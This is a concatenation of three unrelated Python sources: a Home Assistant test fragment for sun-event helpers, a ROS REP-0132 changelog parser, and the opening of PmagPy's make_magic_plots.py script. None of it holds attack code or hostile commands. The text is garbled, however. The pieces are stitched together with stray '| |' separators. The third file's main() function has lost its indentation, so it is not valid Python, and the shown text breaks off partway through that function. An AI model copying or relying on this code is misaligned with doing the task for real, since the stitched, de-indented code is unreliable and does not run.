            astral.sunrise_utc(when, latitude, longitude),
            astral.sunset_utc(when, latitude, longitude),
        )

    def test_next_events(self):
        """Test retrieving next sun events."""
        utc_now = datetime(2016, 11, 1, 8, 0, 0, tzinfo=dt_util.UTC)
        from astral import Astral
        astral = Astral()
        utc_today = utc_now.date()
        latitude = self.hass.config.latitude
        longitude = self.hass.config.longitude

        def find_next(event, *args):
            """Return the first *event* time after utc_now, scanning day
            by day, starting one day early (an event can fall on the
            previous calendar day)."""
            day_offset = -1
            while True:
                candidate = event(utc_today + timedelta(days=day_offset),
                                  *args)
                if candidate > utc_now:
                    return candidate
                day_offset += 1

        next_dawn = find_next(astral.dawn_utc, latitude, longitude)
        next_dusk = find_next(astral.dusk_utc, latitude, longitude)
        next_midnight = find_next(astral.solar_midnight_utc, longitude)
        next_noon = find_next(astral.solar_noon_utc, longitude)
        next_rising = find_next(astral.sunrise_utc, latitude, longitude)
        next_setting = find_next(astral.sunset_utc, latitude, longitude)

        with patch('homeassistant.helpers.condition.dt_util.utcnow',
                   return_value=utc_now):
            assert next_dawn == sun.get_astral_event_next(
                self.hass, 'dawn')
            assert next_dusk == sun.get_astral_event_next(
                self.hass, 'dusk')
            assert next_midnight == sun.get_astral_event_next(
                self.hass, 'solar_midnight')
            assert next_noon == sun.get_astral_event_next(
                self.hass, 'solar_noon')
            assert next_rising == sun.get_astral_event_next(
                self.hass, SUN_EVENT_SUNRISE)
            assert next_setting == sun.get_astral_event_next(
                self.hass, SUN_EVENT_SUNSET)

    def test_date_events(self):
        """Test retrieving sun events for an explicit date."""
        utc_now = datetime(2016, 11, 1, 8, 0, 0, tzinfo=dt_util.UTC)
        from astral import Astral
        astral = Astral()
        utc_today = utc_now.date()
        dawn, dusk, midnight, noon, sunrise, sunset = \
            self._reference_events(astral, utc_today)
        assert dawn == sun.get_astral_event_date(
            self.hass, 'dawn', utc_today)
        assert dusk == sun.get_astral_event_date(
            self.hass, 'dusk', utc_today)
        assert midnight == sun.get_astral_event_date(
            self.hass, 'solar_midnight', utc_today)
        assert noon == sun.get_astral_event_date(
            self.hass, 'solar_noon', utc_today)
        assert sunrise == sun.get_astral_event_date(
            self.hass, SUN_EVENT_SUNRISE, utc_today)
        assert sunset == sun.get_astral_event_date(
            self.hass, SUN_EVENT_SUNSET, utc_today)

    def test_date_events_default_date(self):
        """Test date events with 'now' patched (explicit date still wins)."""
        utc_now = datetime(2016, 11, 1, 8, 0, 0, tzinfo=dt_util.UTC)
        from astral import Astral
        astral = Astral()
        utc_today = utc_now.date()
        dawn, dusk, midnight, noon, sunrise, sunset = \
            self._reference_events(astral, utc_today)
        with patch('homeassistant.util.dt.now', return_value=utc_now):
            assert dawn == sun.get_astral_event_date(
                self.hass, 'dawn', utc_today)
            assert dusk == sun.get_astral_event_date(
                self.hass, 'dusk', utc_today)
            assert midnight == sun.get_astral_event_date(
                self.hass, 'solar_midnight', utc_today)
            assert noon == sun.get_astral_event_date(
                self.hass, 'solar_noon', utc_today)
            assert sunrise == sun.get_astral_event_date(
                self.hass, SUN_EVENT_SUNRISE, utc_today)
            assert sunset == sun.get_astral_event_date(
                self.hass, SUN_EVENT_SUNSET, utc_today)

    def test_date_events_accepts_datetime(self):
        """Test that date events accept a datetime (not only a date)."""
        utc_now = datetime(2016, 11, 1, 8, 0, 0, tzinfo=dt_util.UTC)
        from astral import Astral
        astral = Astral()
        utc_today = utc_now.date()
        # Reference values are computed for the date; the helper must
        # accept the full datetime and yield the same events.
        dawn, dusk, midnight, noon, sunrise, sunset = \
            self._reference_events(astral, utc_today)
        assert dawn == sun.get_astral_event_date(
            self.hass, 'dawn', utc_now)
        assert dusk == sun.get_astral_event_date(
            self.hass, 'dusk', utc_now)
        assert midnight == sun.get_astral_event_date(
            self.hass, 'solar_midnight', utc_now)
        assert noon == sun.get_astral_event_date(
            self.hass, 'solar_noon', utc_now)
        assert sunrise == sun.get_astral_event_date(
            self.hass, SUN_EVENT_SUNRISE, utc_now)
        assert sunset == sun.get_astral_event_date(
            self.hass, SUN_EVENT_SUNSET, utc_now)

    def test_is_up(self):
        """Test sun.is_up on both sides of sunrise/sunset."""
        # At 12:00 UTC the sun is not up for the test location.
        utc_now = datetime(2016, 11, 1, 12, 0, 0, tzinfo=dt_util.UTC)
        with patch('homeassistant.helpers.condition.dt_util.utcnow',
                   return_value=utc_now):
            assert not sun.is_up(self.hass)
        # At 18:00 UTC it is.
        utc_now = datetime(2016, 11, 1, 18, 0, 0, tzinfo=dt_util.UTC)
        with patch('homeassistant.helpers.condition.dt_util.utcnow',
                   return_value=utc_now):
            assert sun.is_up(self.hass)

    def test_norway_in_june(self):
        """Test location in Norway where the sun doesn't set in summer."""
        self.hass.config.latitude = 69.6
        self.hass.config.longitude = 18.8
        june = datetime(2016, 6, 1, tzinfo=dt_util.UTC)
        # Print the late-July events to ease debugging on failure.
        for day in (25, 26):
            print(sun.get_astral_event_date(self.hass, SUN_EVENT_SUNRISE,
                                            datetime(2017, 7, day)))
            print(sun.get_astral_event_date(self.hass, SUN_EVENT_SUNSET,
                                            datetime(2017, 7, day)))
        # The next sunrise/sunset after June 1st is only in late July.
        assert sun.get_astral_event_next(self.hass, SUN_EVENT_SUNRISE, june) \
            == datetime(2016, 7, 25, 23, 23, 39, tzinfo=dt_util.UTC)
        assert sun.get_astral_event_next(self.hass, SUN_EVENT_SUNSET, june) \
            == datetime(2016, 7, 26, 22, 19, 1, tzinfo=dt_util.UTC)
        # During midnight sun there is no event on that date at all.
        assert sun.get_astral_event_date(self.hass, SUN_EVENT_SUNRISE, june) \
            is None
        assert sun.get_astral_event_date(self.hass, SUN_EVENT_SUNSET, june) \
            is None
| |
# Software License Agreement (BSD License)
#
# Copyright (c) 2013, Open Source Robotics Foundation, Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of Open Source Robotics Foundation, Inc. nor
# the names of its contributors may be used to endorse or promote
# products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
'''
Processes ROS changelogs so that they can be used in binary packaging.
The Changelog format is described in REP-0132:
http://ros.org/reps/rep-0132.html
'''
from __future__ import print_function
from __future__ import unicode_literals
import sys
# True when running under Python 3; used by the __str__ implementations
# below to decide whether the unicode rendering must be byte-encoded.
_py3 = sys.version_info >= (3, 0)
import dateutil.parser
import docutils
import docutils.core
import logging
import os
import pkg_resources
import re
# ``unicode`` only exists on Python 2; on Python 3 ``str`` is already unicode.
try:
    _unicode = unicode
except NameError:
    _unicode = str
__author__ = "William Woodall"
__email__ = "william@osrfoundation.org"
__maintainer__ = "William Woodall"
log = logging.getLogger('changelog')
CHANGELOG_FILENAME = 'CHANGELOG.rst'
example_rst = """\
^^^^^^^^^^^^^^^^^^^^^^^^^
Changelog for package foo
^^^^^^^^^^^^^^^^^^^^^^^^^
0.1
===
Free form text about this minor release.
0.1.27 (forthcoming)
--------------------
* Great new feature
0.1.26 (2012-12-26)
-------------------
* Utilizes caching to improve query performance (fix https://github.com/ros/ros_comm/pull/2)
* Simplified API calls based on (https://github.com/ros/robot_model):
* Note that these changes are based on REP 192
* Also they fix a problem related to initialization
* Fixed synchronization issue on startup
.. not mentioning secret feature on purpose
0.1.25 (2012-11-25)
-------------------
- Added thread safety
- Replaced custom XML parser with `TinyXML <http://www.grinninglizard.com/tinyxml/>`_.
- Fixed regression introduced in 0.1.22
- New syntax for foo::
foo('bar')
- Added a safety check for XML parsing
----
The library should now compile under ``Win32``
0.1.0 (2012-10-01)
------------------
*First* public **stable** release
0.0
===
0.0.1 (2012-01-31)
------------------
1. Initial release
2. Initial bugs
"""
def bullet_list_class_from_docutils(bullet_list, bullet_type=None):
    '''
    Processes elements of bullet list into an encapsulating class

    :param bullet_list: ``docutils.nodes.bullet_list`` list to be processed
    :param bullet_type: ``str`` either 'bullet' or 'enumerated'
    :returns: ``BulletList`` object representing a docutils bullet_list
    '''
    result = BulletList(bullet_type=bullet_type)
    for element in bullet_list.children:
        if not isinstance(element, docutils.nodes.list_item):
            # Anything that is not a list item (e.g. comments) is dropped.
            log.debug("Skipped bullet_list child: '{0}'".format(element))
            continue
        result.bullets.append(mixed_text_from_docutils(element))
    return result
def mixed_text_from_docutils(node):
    '''
    Takes most Text-ish docutils objects and converts them to MixedText

    :param node: ``docutils.nodes.{paragraph, list_item, ...}`` text-ish
    :returns: ``MixedText`` representing the given docutils object
    '''
    content = MixedText()
    for child in node.children:
        if isinstance(child, docutils.nodes.paragraph):
            # Flatten paragraph contents into this MixedText (recursive).
            content.texts.extend(mixed_text_from_docutils(child).texts)
        elif isinstance(child, docutils.nodes.Text):
            content.texts.append(child.astext())
        elif isinstance(child, docutils.nodes.reference):
            # Hyperlinks become lightweight Reference objects.
            content.texts.append(reference_from_docutils(child))
        elif isinstance(child, docutils.nodes.emphasis):
            # Inline markup is re-encoded back to its ReST source form.
            content.texts.append('*{0}*'.format(child.astext()))
        elif isinstance(child, docutils.nodes.strong):
            content.texts.append('**{0}**'.format(child.astext()))
        elif isinstance(child, docutils.nodes.literal):
            content.texts.append('``{0}``'.format(child.astext()))
        elif isinstance(child, docutils.nodes.literal_block):
            content.texts.append('\n\n  ' + child.astext() + '\n')
        elif isinstance(child, docutils.nodes.target):
            # Link targets carry no renderable text; skip silently.
            pass
        elif isinstance(child, docutils.nodes.system_message):
            log.debug("Skipping system_message: {0}".format(child))
        elif isinstance(child, docutils.nodes.bullet_list):
            # Nested bullet lists are kept structured, not flattened.
            content.texts.append(bullet_list_class_from_docutils(child))
        else:
            try:
                # Try to add it as plain text
                log.debug("Trying to add {0}'s child of type {1}: '{2}'"
                          .format(type(node), type(child), child))
                content.texts.append(child.astext())
            except AttributeError:
                # Node has no astext(); nothing sensible to render.
                log.debug("Ignored {0} child of type {1}: '{2}'"
                          .format(type(node), type(child), child))
    return content
def get_changelog_from_path(path, package_name=None):
    '''
    Changelog factory, which reads a changelog file into a class

    :param path: ``str`` the path of the changelog including or excluding the filename CHANGELOG.rst
    :param package_name: ``str`` the package name
    :returns: ``Changelog`` changelog class or None if file was not readable
    '''
    changelog = Changelog(package_name)
    # A directory path is resolved to the conventional changelog file name.
    if os.path.isdir(path):
        path = os.path.join(path, CHANGELOG_FILENAME)
    try:
        with open(path, 'r') as handle:
            populate_changelog_from_rst(changelog, handle.read())
    except IOError:
        # Missing/unreadable changelog is signalled with None, not raised.
        return None
    return changelog
def populate_changelog_from_rst(changelog, rst):
    '''
    Changelog factory, which converts the raw ReST into a class

    :param changelog: ``Changelog`` changelog to be populated
    :param rst: ``str`` raw ReST changelog
    :returns: ``Changelog`` changelog that was populated
    '''
    # Parse the ReST into a docutils document tree and walk its children.
    doctree = docutils.core.publish_doctree(rst)
    processes_changelog_children(changelog, doctree.children)
    # Keep the raw source around for callers that want to re-emit it.
    changelog.rst = rst
    return changelog
def processes_changelog_children(changelog, children):
    '''
    Processes docutils children into a REP-0132 changelog instance.
    Recurse into sections, check (sub-)titles if they are valid versions.

    :param changelog: ``Changelog`` changelog to be populated
    :param children: ``list(docutils.nodes.Node)`` children to be processed
    :returns: ``Changelog`` changelog that was populated
    '''
    for i, child in enumerate(children):
        if isinstance(child, docutils.nodes.section):
            # Recurse into nested sections first.
            processes_changelog_children(changelog, child.children)
        elif isinstance(child, docutils.nodes.title) or isinstance(child, docutils.nodes.subtitle):
            version, date = None, None
            # See if the title has a text element in it
            if len(child.children) > 0 and isinstance(child.children[0], docutils.nodes.Text):
                # Extract version and date from (sub-)title
                title_text = child.children[0].rawsource
                try:
                    version, date = version_and_date_from_title(title_text)
                except InvalidSectionTitle:
                    # Catch invalid section titles
                    log.debug("Ignored non-compliant title: '{0}'".format(title_text))
                    continue
            valid_section = None not in (version, date)
            if valid_section:
                contents = []
                # For each remaining sibling
                # NOTE: this inner loop deliberately shadows the outer
                # ``child`` — it consumes the siblings after the title.
                for child in children[i + 1:]:
                    # Skip sections (nesting of valid sections not allowed)
                    if isinstance(child, docutils.nodes.section):
                        log.debug("Ignored section child: '{0}'".format(child))
                        continue
                    # Skip title
                    if isinstance(child, docutils.nodes.title):
                        continue
                    # Skip comments
                    if isinstance(child, docutils.nodes.comment):
                        log.debug("Ignored section child: '{0}'".format(child))
                        continue
                    # Process other elements into the contents
                    if isinstance(child, docutils.nodes.bullet_list):
                        contents.append(bullet_list_class_from_docutils(child))
                    elif isinstance(child, docutils.nodes.enumerated_list):
                        contents.append(bullet_list_class_from_docutils(child, bullet_type='enumerated'))
                    elif isinstance(child, docutils.nodes.transition):
                        contents.append(Transition())
                    elif isinstance(child, docutils.nodes.paragraph):
                        contents.append(mixed_text_from_docutils(child))
                    else:
                        log.debug("Skipped section child: '{0}'".format(child))
                changelog.add_version_section(version, date, contents)
                # Only the first valid (sub-)title per children list is used.
                break
        else:
            log.debug("Ignored non-compliant title: '{0}'".format(child))
def reference_from_docutils(reference):
    '''
    Turns a reference element into a ``Reference``

    :param reference: ``docutils.nodes.reference`` reference element
    :returns: ``Reference`` simpler object representing the reference
    '''
    # attlist() yields (key, value) pairs; building a dict keeps the last
    # occurrence of a duplicated key, matching the original scan behavior.
    attributes = dict(reference.attlist())
    return Reference(attributes.get('name'), attributes.get('refuri'))
def version_and_date_from_title(title):
    '''
    Splits a section title into version and date if possible.

    :param title: ``str`` raw section title to be processed
    :returns: ``(str, datetime.datetime)``
    :raises: ``InvalidSectionTitle`` for non REP-0132 section titles
    '''
    # REP-0132 mandates "X.Y.Z (<date>)" section titles.
    match = re.search(r'^([0-9]+\.[0-9]+\.[0-9]+)[ ]\((.+)\)$', title)
    if match is None:
        raise InvalidSectionTitle(title)
    version, raw_date = match.groups()
    try:
        parsed_date = dateutil.parser.parse(raw_date)
    except (ValueError, TypeError) as err:
        # A date dateutil cannot understand makes the whole title invalid.
        log.debug("Error parsing date ({0}): '{1}'".format(raw_date, err))
        raise InvalidSectionTitle(title)
    return version, parsed_date
class BulletList(object):
    '''Represents a bulleted list of text'''

    def __init__(self, bullets=None, bullet_type=None):
        '''
        :param bullets: ``list(MixedText)`` list of text bullets
        :param bullet_type: ``str`` either 'bullet' or 'enumerated'
        '''
        if bullet_type is None:
            bullet_type = 'bullet'
        if bullet_type not in ('bullet', 'enumerated'):
            raise RuntimeError("Invalid bullet type: '{0}'".format(bullet_type))
        self.bullets = bullets or []
        self.bullet_type = bullet_type

    def __iter__(self):
        return iter(self.bullets)

    def __str__(self):
        rendered = self.__unicode__()
        return rendered if _py3 else rendered.encode('ascii', 'replace')

    def __unicode__(self):
        return self.as_txt()

    def as_rst(self):
        '''Render with rst-friendly hyphen bullets and no indent.'''
        return self.as_txt(indent='', use_hyphen_bullet=True)

    def as_txt(self, indent='', use_hyphen_bullet=False):
        '''Render one bullet per line; continuation lines are indented.'''
        marker = '*' if self.bullet_type == 'bullet' else '#'
        if use_hyphen_bullet and marker == '*':
            marker = '-'
        prefixes = self.bullet_generator(marker)
        continuation = '\n' + indent + '  '
        rendered = [indent + next(prefixes) + _unicode(item).replace('\n', continuation)
                    for item in self]
        return '\n'.join(rendered)

    def bullet_generator(self, bullet):
        '''Yield per-item prefixes: "1. ", "2. ", ... or "<bullet> ".'''
        if '#' == bullet:
            prefixes = ['{0}. '.format(num) for num in range(1, len(self.bullets) + 1)]
        else:
            prefixes = [bullet + ' '] * len(self.bullets)
        for prefix in prefixes:
            yield prefix
class Changelog(object):
    '''
    Represents a REP-0132 changelog
    '''
    def __init__(self, package_name=None):
        '''
        :param package_name: ``str`` name of the package the changelog is for
        '''
        self.__package_name = package_name
        # Version strings, kept sorted ascending by parsed version
        self.__versions = []
        # Parallel list of pkg_resources-parsed versions (sortable)
        self.__parsed_versions = []
        # version string -> release date (datetime.datetime)
        self.__dates = {}
        # version string -> list of content elements for that release
        self.__content = {}
        # Raw ReST this changelog was populated from, if any
        self.__rst = ''
    def __str__(self):
        value = self.__unicode__()
        if not _py3:
            # Python 2: __str__ must return bytes
            value = value.encode('ascii', 'replace')
        return value
    def __unicode__(self):
        # Render the changelog, newest version first.
        msg = []
        if self.__package_name:
            msg.append("Changelog for package '{0}'".format(self.package_name))
        for version, date, content in self.foreach_version(reverse=True):
            msg.append('  ' + version + ' ({0}):'.format(date))
            for item in content:
                msg.extend(['    ' + i for i in _unicode(item).splitlines()])
        return '\n'.join(msg)
    @property
    def package_name(self):
        '''Name of the package this changelog belongs to (or None).'''
        return self.__package_name
    @package_name.setter
    def package_name(self, package_name):
        self.__package_name = package_name
    @property
    def rst(self):
        '''Raw ReST source this changelog was populated from.'''
        return self.__rst
    @rst.setter
    def rst(self, rst):
        self.__rst = rst
    def add_version_section(self, version, date, contents):
        '''
        Adds a version section

        :param version: ``str`` version as a string
        :param date: ``datetime.datetime`` version date
        :param contents: ``list(list([str|Reference]))``` contents as a list
            of lists which contain a combination of ``str`` and
            ``Reference`` objects
        :returns: None
        :raises: ``DuplicateVersionsException`` if version was already added
        '''
        if version in self.__versions:
            raise DuplicateVersionsException(version)
        self.__parsed_versions.append(pkg_resources.parse_version(version))
        self.__parsed_versions = sorted(self.__parsed_versions)
        # Cannot go parsed -> str, so sorting must be done by comparison
        new_versions = [None] * len(self.__parsed_versions)
        for v in self.__versions + [version]:
            parsed_v = pkg_resources.parse_version(v)
            index = self.__parsed_versions.index(parsed_v)
            # NOTE(review): list.index raises ValueError when the item is
            # missing, so this -1 guard looks like dead code — confirm.
            if index == -1:
                raise RuntimeError("Inconsistent internal version storage state")
            new_versions[index] = v
        self.__versions = new_versions
        self.__dates[version] = date
        self.__content[version] = contents
    def foreach_version(self, reverse=False):
        '''
        Creates a generator for iterating over the versions, dates and content
        Versions are stored and iterated in order.

        :param reverse: ``bool`` if True then the iteration is reversed
        :returns: ``generator`` for iterating over versions, dates and content
        '''
        for version in reversed(self.__versions) if reverse else self.__versions:
            yield version, self.__dates[version], self.__content[version]
    def get_date_of_version(self, version):
        '''Returns date of a given version as a ``datetime.datetime``'''
        if version not in self.__versions:
            raise KeyError("No date for version '{0}'".format(version))
        return self.__dates[version]
    def get_content_of_version(self, version):
        '''
        Returns changelog content for a given version

        :param version: ``str`` version
        :returns: ``list(list([str|Reference]))`` content expanded
        :raises: ``KeyError`` if the version is unknown
        '''
        if version not in self.__versions:
            raise KeyError("No content for version '{0}'".format(version))
        return self.__content[version]
class DuplicateVersionsException(Exception):
    '''Raised when more than one section per version is given'''

    def __init__(self, version):
        # Keep the offending version accessible to handlers.
        self.version = version
        message = "Version '{0}' is specified twice".format(version)
        Exception.__init__(self, message)
class InvalidSectionTitle(Exception):
    '''raised on non REP-0132 section titles'''

    def __init__(self, title):
        # Keep the offending title accessible to handlers.
        self.title = title
        Exception.__init__(
            self,
            "Section title does not conform to REP-0132: '{0}'".format(title))
class MixedText(object):
    '''Represents text mixed with references and nested bullets'''

    def __init__(self, texts=()):
        '''
        :param texts: iterable of ``str``/``Reference``/``BulletList`` parts
        '''
        # FIX: the default used to be a mutable ``[]``; an immutable tuple
        # avoids the shared-mutable-default pitfall. Behavior is unchanged
        # because the input was always copied into a fresh list.
        self.texts = list(texts)

    def __iter__(self):
        for text in self.texts:
            yield text

    def __str__(self):
        value = self.__unicode__()
        if not _py3:
            # Python 2: __str__ must return bytes
            value = value.encode('ascii', 'replace')
        return value

    def __unicode__(self):
        return self.to_txt()

    def to_txt(self, bullet_indent='  '):
        '''Render as plain text; nested bullet lists are indented and
        surrounded by blank lines.'''
        lines = []
        for t in self:
            if isinstance(t, BulletList):
                bullets = [bullet_indent + x for x in _unicode(t).splitlines()]
                bullets = ['', ''] + bullets + ['']
                # FIX: was ``lines.extend(...)`` which appended the joined
                # string one character at a time (it only worked because of
                # the final ''.join). append produces the identical output.
                lines.append('\n'.join(bullets))
            else:
                lines.append(_unicode(t))
        return ''.join(lines)
class Reference(object):
    '''
    Represents a piece of text with an associated link
    '''

    def __init__(self, text, link):
        self.text = text
        self.link = link

    def __str__(self):
        rendered = self.__unicode__()
        return rendered if _py3 else rendered.encode('ascii', 'replace')

    def __unicode__(self):
        return self.as_txt()

    def as_rst(self):
        '''Self as rst (unicode)'''
        # Anonymous references render as the bare link.
        if self.text is None:
            return _unicode(self.link)
        return "`{0} <{1}>`_".format(self.text, self.link)

    def as_txt(self):
        '''Self formatted for plain text (unicode)'''
        if self.text is None:
            return _unicode(self.link)
        return "{0} <{1}>".format(self.text, self.link)
class Transition(object):
    '''Represents a transition element from ReST (a horizontal rule)'''

    def __str__(self):
        value = self.__unicode__()
        if not _py3:
            # Python 2: __str__ must return bytes
            value = value.encode('ascii', 'replace')
        return value

    def __unicode__(self):
        # Rendered as a fixed-width horizontal rule.
        return '-' * 20

    def __iter__(self):
        # BUG FIX: previously yielded ``self.unicode()``, a method that
        # does not exist, so iterating raised AttributeError.
        yield self.__unicode__()
def __test():
    '''Smoke test: parse the example changelog and print the result.'''
    changelog = Changelog('foo')
    print(populate_changelog_from_rst(changelog, example_rst))


if __name__ == '__main__':
    # Enable verbose parser diagnostics when run as a script.
    logging.basicConfig()
    log.setLevel(logging.DEBUG)
    __test()
| |
#!/usr/bin/env python
import sys
import os
import datetime
import glob
import shutil
from pmagpy import pmag
from pmagpy import ipmag
from pmagpy import version
from pmagpy import contribution_builder as cb
from programs import thumbnails
VERBOSE = True


def error_log(msg, loc="", program="", con_id=""):
    """Append a warning record to errors.txt and echo it.

    The file record is tab-separated:
    con_id, timestamp, location, program, message.
    The echoed message omits the timestamp and is prefixed with '-W- '.
    """
    con_id = str(con_id)
    timestamp = str(datetime.datetime.now())
    record = '\t'.join([con_id, timestamp, loc, program, msg]) + '\n'
    with open('errors.txt', 'a') as log:
        log.write(record)
    full_msg = '-W- ' + '\t'.join([con_id, loc, program, msg]) + '\n'
    if VERBOSE:
        print(full_msg)
    sys.stderr.write(full_msg)
def info_log(msg, loc="", program=""):
    """Append a tab-separated record (timestamp, loc, program, msg) to log.txt."""
    record = '\t'.join([str(datetime.datetime.now()), loc, program, msg])
    with open('log.txt', 'a') as log:
        log.write(record + '\n')
def check_for_reqd_cols(data, reqd_cols):
    """
    Check data (PmagPy list of dicts) for required columns.

    Parameters
    ----------
    data : list of dict
        records to check; only the first record's keys are inspected
    reqd_cols : list of str
        column names that must be present

    Returns
    -------
    missing : list of str
        required columns absent from the first record; all of ``reqd_cols``
        when ``data`` is empty (previously this raised IndexError)
    """
    if not data:
        # FIX: empty input used to crash on data[0].
        return list(reqd_cols)
    return [col for col in reqd_cols if col not in data[0]]
def main():
"""
NAME
make_magic_plots.py
DESCRIPTION
inspects magic directory for available data and makes plots
SYNTAX
make_magic_plots.py [command line options]
INPUT
magic files
OPTIONS
-h prints help message and quits
-f FILE specifies input file name
-fmt [png,eps,svg,jpg,pdf] specify format, default is png
"""
if '-h' in sys.argv:
print(main.__doc__)
sys.exit()
# reset log files
for fname in ['log.txt', 'errors.txt']:
f = os.path.join(os.getcwd(), fname)
if os.path.exists(f):
os.remove(f)
image_recs = []
dirlist = ['./']
dir_path = os.getcwd()
#
if '-fmt' in sys.argv:
ind = sys.argv.index("-fmt")
fmt = sys.argv[ind + 1]
else:
fmt = 'png'
do_thumbnails = False if "-no-thumb" in sys.argv else True
if '-f' in sys.argv:
ind = sys.argv.index("-f")
filelist = [sys.argv[ind + 1]]
else:
filelist = os.listdir(dir_path)
## initialize some variables
samp_file = 'samples.txt'
meas_file = 'measurements.txt'
#loc_key = 'location'
loc_file = 'locations.txt'
method_key = 'method_codes'
dec_key = 'dir_dec'
inc_key = 'dir_inc'
tilt_corr_key = "dir_tilt_correction"
aniso_tilt_corr_key = "aniso_tilt_correction"
hyst_bcr_key = "hyst_bcr"
hyst_mr_key = "hyst_mr_moment"
hyst_ms_key = "hyst_ms_moment"
hyst_bc_key = "hyst_bc"
Mkeys = ['magnitude', 'magn_moment', 'magn_volume', 'magn_mass']
results_file = 'sites.txt'
hyst_file = 'specimens.txt'
aniso_file = 'specimens.txt'
# create contribution and propagate data throughout
full_con = cb.Contribution()
full_con.propagate_location_to_measurements()
full_con.propagate_location_to_specimens()
full_con.propagate_location_to_samples()
if not full_con.tables:
print('-E- No MagIC tables could be found in this directory')
error_log("No MagIC tables found")
return
# try to get the contribution id for error logging
con_id = ""
if 'contribution' in full_con.tables:
if 'id' in full_con.tables['contribution'].df.columns:
con_id = full_con.tables['contribution'].df.iloc[0]['id']
# check to see if propagation worked, otherwise you can't plot by location
lowest_table = None
for table in full_con.ancestry:
if table in full_con.tables:
lowest_table = table
break
do_full_directory = False
# check that locations propagated down to the lowest table in the contribution
if 'location' in full_con.tables[lowest_table].df.columns:
if 'locations' not in full_con.tables:
info_log('location names propagated to {}, but could not be validated'.format(lowest_table))
# are there any locations in the lowest table?
elif not all(full_con.tables[lowest_table].df['location'].isnull()):
locs = full_con.tables['locations'].df.index.unique()
lowest_locs = full_con.tables[lowest_table].df['location'].unique()
incorrect_locs = set(lowest_locs).difference(set(locs))
# are they actual locations?
if not incorrect_locs:
info_log('location names propagated to {}'.format(lowest_table))
else:
do_full_directory = True
error_log('location names did not propagate fully to {} table (looks like there are some naming inconsistencies between tables)'.format(lowest_table), con_id=con_id)
else:
do_full_directory = True
error_log('could not propagate location names down to {} table'.format(lowest_table), con_id=con_id)
else:
do_full_directory = True
error_log('could not propagate location names down to {} table'.format(lowest_table), con_id=con_id)
all_data = {}
all_data['measurements'] = full_con.tables.get('measurements', None)
all_data['specimens'] = full_con.tables.get('specimens', None)
all_data['samples'] = full_con.tables.get('samples', None)
all_data['sites'] = full_con.tables.get('sites', None)
all_data['locations'] = full_con.tables.get('locations', None)
if 'locations' in full_con.tables:
locations = full_con.tables['locations'].df.index.unique()
else:
locations = ['']
dirlist = [loc for loc in locations if cb.not_null(loc, False) and loc != 'nan']
if not dirlist:
dirlist = ["./"]
if do_full_directory:
dirlist = ["./"]
# plot the whole contribution as one location
if dirlist == ["./"]:
error_log('plotting the entire contribution as one location', con_id=con_id)
for fname in os.listdir("."):
if fname.endswith(".txt"):
shutil.copy(fname, "tmp_" + fname)
# if possible, go through all data by location
# use tmp_*.txt files to separate out by location
for loc in dirlist:
print('\nworking on: ', loc)
def get_data(dtype, loc_name):
"""
Extract data of type dtype for location loc_name.
Write tmp_dtype.txt files if possible.
"""
if cb.not_null(all_data[dtype], False):
data_container = all_data[dtype]
if loc_name == "./":
data_df = data_container.df
else:
# awkward workaround for chars like "(" and "?" that break in regex
try:
data_df = data_container.df[data_container.df['location'].astype(str).str.contains(loc_name, na=False)]
except: #sre_constants.error:
data_df = data_container.df[data_container.df['location'] == loc_name]
data = data_container.convert_to_pmag_data_list(df=data_df)
res = data_container.write_magic_file('tmp_{}.txt'.format(dtype), df=data_df)
if not res:
return [], []
return data, data_df
return [], []
meas_data, meas_df = get_data('measurements', loc)
spec_data, spec_df = get_data('specimens', loc)
samp_data, samp_df = get_data('samples', loc)
site_data, site_df = get_data('sites', loc)
loc_data, loc_df = get_data('locations', loc)
con = cb.Contribution(read_tables=[])
con.tables['measurements'] = cb.MagicDataFrame(df=meas_df, dtype="measurements")
con.tables['specimens'] = cb.MagicDataFrame(df=spec_df, dtype="specimens")
con.tables['samples'] = cb.MagicDataFrame(df=samp_df, dtype="samples")
con.tables['sites'] = cb.MagicDataFrame(df=site_df, dtype="sites")
con.tables['locations'] = cb.MagicDataFrame(df=loc_df, dtype="locations")
if loc == "./": # if you can't sort by location, do everything together
con = full_con
try:
meas_data = con.tables['measurements'].convert_to_pmag_data_list()
except KeyError:
meas_data = None
try:
spec_data = con.tables['specimens'].convert_to_pmag_data_list()
except KeyError:
spec_data = None
try:
samp_data = con.tables['samples'].convert_to_pmag_data_list()
except KeyError:
samp_data = None
try:
site_data = con.tables['sites'].convert_to_pmag_data_list()
except KeyError:
site_data = None
crd = 's'
if 'samples' in con.tables:
if 'azimuth' in con.tables['samples'].df.columns:
if any(con.tables['samples'].df['azimuth'].dropna()):
crd = 'g'
if crd == 's':
print('using specimen coordinates')
else:
print('using geographic coordinates')
if meas_file in filelist and meas_data: # start with measurement data
print('working on plotting measurements data')
data = meas_data
file_type = 'measurements'
# looking for zeq_magic possibilities
# get all non blank method codes
AFZrecs = pmag.get_dictitem(data, method_key, 'LT-AF-Z', 'has')
# get all non blank method codes
TZrecs = pmag.get_dictitem(data, method_key, 'LT-T-Z', 'has')
# get all non blank method codes
MZrecs = pmag.get_dictitem(data, method_key, 'LT-M-Z', 'has')
# get all dec measurements
